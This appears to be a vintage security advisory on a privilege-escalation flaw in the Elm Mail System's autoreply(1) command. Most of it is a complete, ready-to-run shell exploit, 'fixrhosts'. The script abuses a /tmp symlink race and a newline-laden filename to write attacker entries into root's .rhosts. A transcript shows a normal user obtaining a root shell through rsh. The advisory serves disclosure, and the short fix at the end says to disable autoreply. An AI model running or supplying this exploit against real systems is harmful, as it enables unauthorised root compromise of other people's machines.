COMMAND

    autoreply(1)

SYSTEMS AFFECTED

    Any system with  a standard installation  of The Elm  Mail System.
    All versions are belived to have this vulnerability.

PROBLEM

    autoreply(1) can  be used  to create  root owned  files, with mode
    666.  It  can  also  overwrite  any file with semi user-controlled
    data.

    This  example  demonstrates  how  to  become root on most affected
    machines  by  modifying  root's  .rhosts  file.   Please do not do
    this unless you have permission.

    Create the following script, 'fixrhosts':

    --------------------------- cut here ----------------------------
    #!/bin/sh
    #
    # fixrhosts rhosts-file user machine
    #
    if [ $# -ne 3 ]; then
            echo "Usage: `basename $0` rhosts-file user machine"
            exit 1
    fi
    RHOSTS="$1"
    USERNAME="$2"
    MACHINE="$3"
    cd $HOME
    echo x > "a
    $MACHINE $USERNAME
    b"
    umask 022
    autoreply "a
    $MACHINE $USERNAME
    b"
    cat > /tmp/.rhosts.sh.$$ << 'EOF'
    ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
    exec autoreply off
    exit 0
    EOF
    /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
    rm -f /tmp/.rhosts.sh.$$ "a
    $MACHINE $USERNAME
    b"
    exit 0
    --------------------------- cut here ----------------------------

    (Lines marked with > represent user input)

>   % id
    uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>   % ./fixrhosts ~root/.rhosts 8lgm localhost
    You've been added to the autoreply system.
    You've been removed from the autoreply table.
>   % rsh localhost -l root csh -i
    Warning: no access to tty.
    Thus no job control in this shell.
    #

SOLUTION

    Disable autoreply. Wait for a patch from the Elm maintainers.